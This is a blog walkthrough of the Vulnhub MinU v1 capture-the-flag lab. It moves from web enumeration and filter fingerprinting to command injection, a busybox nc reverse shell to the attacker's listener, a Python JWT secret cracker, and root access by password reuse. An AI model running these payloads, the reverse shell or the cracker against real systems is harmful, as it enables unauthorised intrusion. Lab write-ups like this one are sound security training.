Vulnhub MinU v1 walkthrough

MinU v1

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/MinUv1]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.74.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor
 192.168.56.100  08:00:27:0b:cc:58      1      60  PCS Systemtechnik GmbH
 192.168.56.106  08:00:27:4c:1a:88      1      60  PCS Systemtechnik GmbH

netdiscover, which ships with Kali Linux, identifies the target as 192.168.56.106. Both PCS Systemtechnik MACs are VirtualBox NICs: .100 is VirtualBox's own DHCP server on the host-only network, .106 is the victim VM.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/MinUv1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-31 01:25 EDT
Nmap scan report for localhost (192.168.56.106)
Host is up (0.00022s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.27
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.27 (Ubuntu)
MAC Address: 08:00:27:4C:1A:88 (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.13 seconds

The Nmap scan finds a single open port, 80/tcp, running Apache httpd 2.4.27 on Ubuntu. Note the http-title of 403 Forbidden: Nmap's own HTTP probe was refused, which becomes relevant later.

Get Access

Browsing to port 80 returns the default Apache page, so a browser is served normally even though Nmap's request got a 403. Check the reported version against Exploit-DB:

┌──(kali㉿kali)-[~/Vulnhub/MinUv1]
└─$ searchsploit apache 2.4.27
--------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                 |  Path
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution                                                | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner                                              | php/remote/29316.py
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation                          | linux/local/46676.php
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak                                                               | linux/webapps/42745.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service                                                            | multiple/dos/26710.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow                                           | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)                                     | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)                                     | unix/remote/47080.c
Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Directory Traversal                                            | linux/webapps/39642.txt
Apache Tomcat < 5.5.17 - Remote Directory Listing                                                              | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal                                                            | unix/remote/14489.c
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)                                                      | multiple/remote/6229.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1)  | windows/webapps/42953.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)  | jsp/webapps/42966.py
Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC)                                                   | linux/dos/36906.txt
Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execution                               | linux/remote/34.pl
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Nothing here gives remote access to a bare Apache 2.4.27 on port 80: most entries are for other products (Tomcat, CXF, mod_ssl, old PHP CGI), the OPTIONS memory leak is an information leak rather than code execution, and the only entry whose range actually covers 2.4.27, the apache2ctl graceful / logrotate local privilege escalation, needs code execution on the box first. The target also has no robots.txt.

┌──(kali㉿kali)-[/etc/apt]
└─$ gobuster dir -u http://192.168.56.106 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -v
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.106
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Verbose:                 true
[+] Timeout:                 10s
===============================================================
2022/10/31 01:44:50 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.56.106/091a8460-fe80-4439-8708-05074047dc49 => 403 (Length: 325). To continue please exclude the status code or the length

gobuster aborts before scanning: its probe for a random, non-existent path got a 403 instead of a 404, so it cannot separate hits from misses. The message itself gives the fix (blacklist the status with `-b 403`, or drop that body length with `--exclude-length 325`), and since wafw00f later shows the filter reacts to how the request is shaped, a browser User-Agent via `-a` is another option. The walkthrough instead falls back to dirb:
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[/etc/apt]
└─$ dirb http://192.168.56.106

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Oct 31 01:45:31 2022
URL_BASE: http://192.168.56.106/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.106/ ----
+ http://192.168.56.106/.config (CODE:403|SIZE:296)
+ http://192.168.56.106/_vti_bin/_vti_adm/admin.dll (CODE:403|SIZE:316)
+ http://192.168.56.106/_vti_bin/_vti_aut/author.dll (CODE:403|SIZE:317)
+ http://192.168.56.106/_vti_bin/shtml.dll (CODE:403|SIZE:307)
+ http://192.168.56.106/awstats.conf (CODE:403|SIZE:301)
+ http://192.168.56.106/development.log (CODE:403|SIZE:304)
+ http://192.168.56.106/global.asa (CODE:403|SIZE:299)
+ http://192.168.56.106/global.asax (CODE:403|SIZE:300)
+ http://192.168.56.106/index.html (CODE:200|SIZE:10918)
+ http://192.168.56.106/main.mdb (CODE:403|SIZE:297)
+ http://192.168.56.106/php.ini (CODE:403|SIZE:296)
+ http://192.168.56.106/production.log (CODE:403|SIZE:303)
+ http://192.168.56.106/readfile (CODE:403|SIZE:416)
+ http://192.168.56.106/server-status (CODE:403|SIZE:302)
+ http://192.168.56.106/spamlog.log (CODE:403|SIZE:300)
+ http://192.168.56.106/thumbs.db (CODE:403|SIZE:298)
+ http://192.168.56.106/Thumbs.db (CODE:403|SIZE:298)
+ http://192.168.56.106/WS_FTP.LOG (CODE:403|SIZE:299)
                                                                                                                                                                                                                                           
-----------------
END_TIME: Mon Oct 31 01:45:41 2022
DOWNLOADED: 4612 - FOUND: 18

Nearly every dirb hit is a 403 on a well-known sensitive file name (php.ini, Thumbs.db, WS_FTP.LOG, global.asa, the _vti_bin paths). Those are the request filter refusing the name, not evidence that the file exists; server-status is Apache's own default deny. The only real content is index.html. Next, scan for files with common extensions:

┌──(kali㉿kali)-[/etc/apt]
└─$ gobuster dir -u http://192.168.56.106 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.106
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2022/10/31 01:49:43 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.56.106/187b8151-f319-492a-bd7f-739c63b9d286 => 403 (Length: 325). To continue please exclude the status code or the length

Same abort, for the same reason. dirb does not stop on a 403 wildcard, so rerun it with extensions:

┌──(kali㉿kali)-[/etc/apt]
└─$ dirb http://192.168.56.106 -X .php,.html,.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Oct 31 01:50:37 2022
URL_BASE: http://192.168.56.106/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php,.html,.txt) | (.php)(.html)(.txt) [NUM = 3]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.106/ ----
+ http://192.168.56.106/index.html (CODE:200|SIZE:10918)                                                                                                                                                                                   
+ http://192.168.56.106/test.php (CODE:200|SIZE:1986)

-----------------
END_TIME: Mon Oct 31 01:51:07 2022
DOWNLOADED: 13836 - FOUND: 2

This turns up test.php (gobuster would have found it too with the 403 excluded). Fetch it:

┌──(kali㉿kali)-[/etc/apt]
└─$ curl http://192.168.56.106/test.php
<!DOCTYPE html>
<html>
<head>
    <title>OMGJS</title>
    <script src='client.min.js'></script>
</head>
<body>
    <h2>OMGJS - <strike>Everything</strike> a browser knows about you</h2>
    <small>It actually knows more...</small>
    <noscript>No js yay!</noscript>
    <p id='data'></p>
    <a href='test.php?file=last.html'>Read last visitor data</a>
    <script>
        let xhttp = new XMLHttpRequest();
        let xData;
        xhttp.onreadystatechange = function() {if (this.readyState == 4 && this.status == 200) {xData = JSON.parse(xhttp.responseText);}};
        xhttp.open("GET", "https://geoip-db.com/json/", false);
        xhttp.send(null);

        let client = new ClientJS();
        
        let jsData = `<h4>Browser: </h4> ${client.getBrowser()} ${client.getBrowserMajorVersion()} ${client.getEngine()} ${client.getEngineVersion()}`;
        jsData += `<h4>OS: </h4> ${client.getOS()} ${client.getOSVersion()}`;
        jsData += `<h4>Screen: </h4> ${client.getScreenPrint()}`;
        if (xData != null) {
            jsData += `<h4>Location: </h4> ${xData.city} ${xData.state} ${xData.country_name}`;
            jsData += `<h4>Latitude, Longitude: </h4> ${xData.latitude}, ${xData.longitude}`;
            jsData += `<h4>IP: </h4> ${xData.IPv4}`;
        }
        jsData += `<h4>Plugins: </h4> ${client.getPlugins()}`;
        jsData += `<h4>TimeZone, Language: </h4> ${client.getTimeZone()} ${client.getLanguage()}`;
        jsData += `<h4>Mobile: </h4> ${client.isMobile()} Android: ${client.isMobileAndroid()} iPhone: ${client.isIphone()} iPad: ${client.isIpad()}`;
        jsData += `<h4>Device: </h4> ${client.getDevice()} ${client.getDeviceType()}`;
        jsData += `<h4>CPU: </h4> ${client.getCPU()}`;
        jsData += `<h4>Local Storage, Session Storage, Cookies enabled: </h4> ${client.isLocalStorage()} ${client.isSessionStorage()} ${client.isCookie()}`;

        document.getElementById('data').innerHTML = jsData;
    </script>
</body>
</html>

The returned page links back to itself with a file parameter:

<a href='test.php?file=last.html'>Read last visitor data</a>

A parameter that names a file to read is the classic setup for local file inclusion, so the first thing to try is path traversal:

└─$ curl http://192.168.56.106/test.php?file=../../../../../../../etc/passwd
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /test.php
on this server.<br />
</p>
<hr>
<address>Apache/2.4.27 (Ubuntu) Server at 192.168.56.106 Port 80</address>
</body></html>

The traversal is refused outright with Apache's generic 403 page rather than a PHP error or the file, which means something in front of test.php is inspecting the request: a WAF or request filter. Fingerprint it:

┌──(kali㉿kali)-[/etc/apt]
└─$ wafw00f http://192.168.56.106

                ______
               /      \
              (  W00f! )
               \  ____/
               ,,    __            404 Hack Not Found
           |`-.__   / /                      __     __
           /"  _/  /_/                       \ \   / /
          *===*    /                          \ \_/ /  405 Not Allowed
         /     )__//                           \   /
    /|  /     /---`                        403 Forbidden
    \\/`   \ |                                 / _ \
    `\    /_\\_              502 Bad Gateway  / / \ \  500 Internal Error
      `_____``-`                             /_/   \_\

                        ~ WAFW00F : v2.2.0 ~
        The Web Application Firewall Fingerprinting Toolkit
    
[*] Checking http://192.168.56.106
[+] Generic Detection results:
[*] The site http://192.168.56.106 seems to be behind a WAF or some sort of security solution
[~] Reason: The response was different when the request wasn't made from a browser.
Normal response code is "200", while the response code to a modified request is "403"
[~] Number of requests: 4

wafw00f confirms the site sits behind a WAF or similar control (the same request gets 200 when it looks like a browser's and 403 once modified) but cannot name the product. The root flag at the end identifies it: mod_security with OWASP CRS 3.0 at paranoia level 3.

The next step is to fuzz the file parameter and see which payloads the filter lets through:

┌──(kali㉿kali)-[/etc/apt]
└─$ wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/All_attack.txt --hc 403 http://192.168.56.106/test.php?file=FUZZ  
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.106/test.php?file=FUZZ
Total requests: 468

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                    
=====================================================================

000000003:   200        40 L     159 W      1986 Ch     "FALSE"
000000013:   200        40 L     159 W      1986 Ch     "65536"
000000001:   200        40 L     159 W      1986 Ch     "A"
000000012:   200        40 L     159 W      1986 Ch     "-20"
000000007:   200        40 L     159 W      1986 Ch     "-1"
000000015:   200        40 L     159 W      1986 Ch     "-26843545

The first run hides only the 403s, to establish a baseline. Everything that survives is the unmodified test.php page (40 lines, 159 words, 1986 bytes): the value was accepted but had no visible effect. Rerun hiding that baseline word count as well, so only responses that actually differ remain:

  
┌──(kali㉿kali)-[/etc/apt]
└─$ wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/All_attack.txt --hc 403 --hw 159 http://192.168.56.106/test.php?file=FUZZ  
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.106/test.php?file=FUZZ
Total requests: 468

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                    
=====================================================================

000000046:   200        41 L     163 W      2033 Ch     "|dir"
000000045:   200        41 L     162 W      2040 Ch     "|id"
000000104:   403        11 L     32 W       297 Ch      "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%255cboot.ini"
Total time: 0
Processed Requests: 468
Filtered Requests: 465
Requests/sec.: 0

Two payloads change the response: |dir and |id come back with an extra line and a few extra words (163 and 162 instead of 159), so the parameter is reaching a shell and the pipe character is not blocked; the command's output is being appended to the page. This is command injection, not file inclusion. (The one remaining 403 line can be ignored.) Verify with curl:

┌──(kali㉿kali)-[/etc/apt]
└─$ curl http://192.168.56.106/test.php?file=|dir                           
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1986  100  1986    0     0   300k      0 --:--:-- --:--:-- --:--:--  323k
apt.conf.d  auth.conf.d  keyrings  preferences.d  sources.list  sources.list.back  sources.list.d  trusted.gpg.d

┌──(kali㉿kali)-[/etc/apt]
└─$ curl http://192.168.56.106/test.php?file=|id 
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1986  100  1986    0     0   360k      0 --:--:-- --:--:-- --:--:--  387k
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),115(bluetooth),125(scanner),141(wireshark),143(kaboxer),144(vboxsf)

These two commands do not verify anything on the target. The `|` is unquoted, so the local shell treats it as a pipe: it runs `curl http://192.168.56.106/test.php?file=` (the plain 1986-byte page, as the progress meter shows) and feeds that output into a local `dir` or `id`. That is why the listing is Kali's own /etc/apt (the working directory in the prompt) and why `id` reports uid=1000(kali) instead of www-data. To test properly, quote the URL or let curl encode the parameter, for example `curl -G --data-urlencode 'file=|id' http://192.168.56.106/test.php`, and look for the command output appended to the page. The wfuzz word counts had already shown the injection works, and the shell below settles it.

A bare command slips through, but a reverse shell needs arguments (an address, a port, spaces), and that shape is what the filter catches, so it has to be dressed differently:
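The page never shows the server side of test.php, so the following is an added example, not MinU's code, of the shape that makes `|id` behave as observed (a file name glued into a shell command line) next to a version that keeps the feature and removes the bug. The web root, the last.html contents and the use of `cat` are assumptions; the payloads are the ones from the page.

```python
from __future__ import annotations

import re
import subprocess
import tempfile
from pathlib import Path

# Constructed stand-in for /var/www/html on the target (an assumption: the
# page never shows the server side of test.php). It holds the one file the
# link on the page asks for.
WEBROOT = Path(tempfile.mkdtemp(prefix="minu_webroot_")).resolve()
(WEBROOT / "last.html").write_text("<p>last visitor: Firefox on Linux</p>\n")


def vulnerable_read(name: str) -> str:
    """Guessed shape of the original handler: the request parameter is
    concatenated into a shell command line, so anything the shell treats
    specially (| ; && $() backticks) turns a file read into command execution."""
    proc = subprocess.run(
        "cat " + name,               # string concatenation: the shell parses the payload
        shell=True,
        cwd=WEBROOT,
        stdin=subprocess.DEVNULL,    # so "cat |id" does not block waiting for input
        capture_output=True,
        text=True,
    )
    return proc.stdout


# Only plain .html names are acceptable values for file=.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+\.html")


def hardened_read(name: str) -> str | None:
    """Same feature without the bug: allowlist the name, resolve it and make
    sure it is still inside WEBROOT, then read it with the runtime instead of
    a shell. Returns None for anything that fails a check."""
    if not SAFE_NAME.fullmatch(name):
        return None
    target = (WEBROOT / name).resolve()
    if not target.is_relative_to(WEBROOT):
        return None
    try:
        return target.read_text()
    except OSError:
        return None


# Payloads from the page: the legitimate file, the traversal the filter
# blocked, and the two pipe payloads wfuzz surfaced.
PAYLOADS = ["last.html", "../../../../../../../etc/passwd", "|dir", "|id"]


def compare(payloads: list[str] = PAYLOADS) -> dict[str, tuple[str, str | None]]:
    """Run each payload through both handlers and return (vulnerable, hardened) outputs."""
    return {p: (vulnerable_read(p), hardened_read(p)) for p in payloads}


if __name__ == "__main__":
    for payload, (vuln_out, safe_out) in compare().items():
        print(f"file={payload!r}")
        print("  vulnerable:", (vuln_out.strip() or "<empty>")[:60])
        print("  hardened:  ", safe_out.strip() if safe_out else "rejected")
```

The hardened version does three independent things, and each one alone would have stopped a different payload on the page: the allowlist rejects `|id` and `../`, the containment check after `resolve()` catches a symlink or any name that slips past the pattern, and reading through the runtime rather than a shell means there is no command line left for a WAF to have to protect.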

http://192.168.3.88/test.php?file=dayu;busybox nc 192.168.56.137 5555 -e sh

(Ha, I simply copied what someone else did here.)

With this lab's addresses substituted (target 192.168.56.106, Kali listener 192.168.56.107), the listener receives a connection as www-data, which is then upgraded to a pty with python3. The flag note at the end explains why this gets past the filter: the bash wildcard `?` is what mod_security lets through.

┌──(kali㉿kali)-[/etc/apt]
└─$ sudo nc -nlvp 5555                      
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.106] 52736
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@MinU:/var/www/html$ 

www-data@MinU:/var/www/html$ cd /home
cd /home
www-data@MinU:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root root 4.0K Apr 24  2018 .
drwxr-xr-x 21 root root 4.0K Apr 24  2018 ..
drwxr-xr-x  2 bob  bob  4.0K Apr 26  2018 bob
www-data@MinU:/home$ cd bob
cd bob
www-data@MinU:/home/bob$ ls -alh
ls -alh
total 12K
drwxr-xr-x 2 bob  bob  4.0K Apr 26  2018 .
drwxr-xr-x 3 root root 4.0K Apr 24  2018 ..
-rw-r--r-- 1 bob  bob   155 Apr 30  2018 ._pw_
www-data@MinU:/home/bob$ cat ._pw_
cat ._pw_
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg

This is a JSON Web Token: three base64url segments separated by dots (header, payload, signature). The header decodes to {"alg":"HS256","typ":"JWT"} and the payload to the standard jwt.io sample ({"sub":"1234567890","name":"John Doe","iat":1516239022}), so the only thing of value in it is the signature, an HMAC-SHA256 keyed with a secret. A short secret can be brute-forced offline. Search GitHub for a JWT cracker:

https://github.com/brendan-rius/c-jwt-cracker

┌──(kali㉿kali)-[~/Vulnhub/MinUv1]
└─$ git clone https://github.com/brendan-rius/c-jwt-cracker.git
Cloning into 'c-jwt-cracker'...
remote: Enumerating objects: 73, done.
remote: Counting objects: 100% (11/11), done.
remote: Compressing objects: 100% (10/10), done.
remote: Total 73 (delta 2), reused 7 (delta 0), pack-reused 62
Receiving objects: 100% (73/73), 26.27 KiB | 153.00 KiB/s, done.
Resolving deltas: 100% (33/33), done.

┌──(kali㉿kali)-[~/Vulnhub/MinUv1/c-jwt-cracker]
└─$ sudo docker build . -t jwtcrack

Running the built image against the token recovers the HS256 secret: mlnV1. The secret has been reused as a password, and it is root's:
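The page does not show the cracker being run, so here is an added example of the same attack in Python (not c-jwt-cracker's code): decode the token, check the algorithm, and test candidate secrets by recomputing the HMAC-SHA256 signature. The candidate wordlist is constructed for the example; the page reports the real secret as mlnV1, which is included in it. c-jwt-cracker does the same comparison but enumerates every string over an alphabet in C, which is what makes a five-character secret feasible.

```python
from __future__ import annotations

import base64
import hashlib
import hmac
import json
from typing import Iterable

# The token found in /home/bob/._pw_ on the page.
PAGE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."
    "pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg"
)

# Constructed candidate list for this example; the page reports the real secret as mlnV1.
WORDLIST = ["secret", "password", "admin", "minu", "MinU", "your-256-bit-secret", "mlnV1"]


def b64url_decode(s: str) -> bytes:
    """JWT segments are base64url without padding; restore it before decoding."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def decode_jwt(token: str) -> tuple[dict, dict, bytes]:
    """Split header.payload.signature and decode the JSON parts (no verification)."""
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), b64url_decode(s)


def sign_hs256(header_b64: str, payload_b64: str, secret: bytes) -> bytes:
    """HS256 signature: HMAC-SHA256 over the two base64url segments joined by a dot."""
    return hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()


def make_hs256_token(payload: dict, secret: bytes) -> str:
    """Mint a token with a known secret so the cracker can be checked offline."""
    h = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{h}.{p}.{b64url_encode(sign_hs256(h, p, secret))}"


def crack_hs256(token: str, candidates: Iterable[str]) -> str | None:
    """Return the first candidate whose HMAC reproduces the token's signature, else None.
    Only HS256 is attempted: an RS256 signature is not a function of a shared secret."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError(f"not an HS256 token: alg={header.get('alg')!r}")
    sig = b64url_decode(sig_b64)
    for cand in candidates:
        if hmac.compare_digest(sign_hs256(header_b64, payload_b64, cand.encode()), sig):
            return cand
    return None


if __name__ == "__main__":
    header, payload, _ = decode_jwt(PAGE_TOKEN)
    print("header: ", header)
    print("payload:", payload)
    # Returns None if the wordlist misses; the page reports mlnV1 as the secret.
    print("secret: ", crack_hs256(PAGE_TOKEN, WORDLIST))
```

The attack is possible only because HS256 is symmetric: whoever can verify a token can also mint one, and the token's own signature is a free oracle for testing secrets offline at HMAC speed. The fix on the issuing side is a random secret of at least 32 bytes (or an asymmetric algorithm), and never a secret that is also a password.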

www-data@MinU:/home/bob$ su - root
su - root
Password: mlnV1

root@MinU:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@MinU:~# ls /root
ls /root
flag.txt
root@MinU:~# pwd
pwd
/root
root@MinU:~# cat flag.txt
cat flag.txt
  __  __ _       _    _      __
 |  \/  (_)     | |  | |    /_ |
 | \  / |_ _ __ | |  | |_   _| |
 | |\/| | | '_ \| |  | \ \ / / |
 | |  | | | | | | |__| |\ V /| |
 |_|  |_|_|_| |_|\____/  \_/ |_|


# You got r00t!

flag{c89031ac1b40954bb9a0589adcb6d174}

# You probably know this by now but the webserver on this challenge is
# protected by mod_security and the owasp crs 3.0 project on paranoia level 3.
# The webpage is so poorly coded that even this configuration can be bypassed
# by using the bash wildcard ? that allows mod_security to let the command through.
# At least that is how the challenge was designed ;)
# Let me know if you got here using another method!

# contact@8bitsec.io
# @_8bitsec
root@MinU:~# 

Posted 2022-10-31 14:56 by Jason_huawen